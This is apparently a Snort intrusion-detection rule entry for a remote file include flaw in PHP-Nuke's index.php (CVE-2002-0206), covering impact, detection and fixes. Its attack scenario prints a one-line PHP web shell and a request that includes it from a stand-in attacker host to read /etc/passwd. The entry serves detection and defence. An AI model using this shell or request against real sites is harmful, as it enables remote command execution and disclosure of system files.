GEN:SID | 1:1399 |
Message | WEB-PHP PHP-Nuke remote file include attempt |
Summary | A remote machine has possibly attempted to include a remote file as part of PHP-nuke index.php.
|
Impact | Possible file disclosure, or command execution at the privledge level of the user running the webserver.
|
Detailed Information | The index.php included with PHP-nuke allows inclusion of additional files. Normal usage might be situations where a webmaster wants to include additional code in their index.php. This can be done via "index.php?file=<path_to_file>". PHP-nuke also allows inclusion of files from remote sources specified by either ftp or http as the transport protocol. This allows attackers to craft their own php file (say, foo.php) and store it remotely (say, http://mysite.org/foo.php) and then instruct the victim machine to include foo.php as part of it's source. Any code in foo.php will get executed on the victim machine.
|
Affected Systems | |
Attack Scenarios | In an attempt to gain access to a remote site that happens to use PHP-nuke, an attacker crafts the following foo.php, and places it on a website that he controls: <?php system($cmd); ?>
The attacker can then include foo.php as part of a remote site's index.php that uses PHP-nuke, and execute any command:
lynx \ http://victim.com/index.php?file=http://attacker.org/foo.php?cmd=cat%20/etc/passwd
|
Ease of Attack | Anyone with access to a web browser and a publicly available web server on which they have the ability to make files viewable from the web.
|
Corrective Action | If you run PHP-nuke, either upgrade to the latest revision, or edit the source to remove support for file inclusion. Check your web logs for attempted file inclusion. If found, investigate this as a possible system-level intrusion.
|
Additional References | |
Rule References | bugtraq: 3889
cve: 2002-0206
|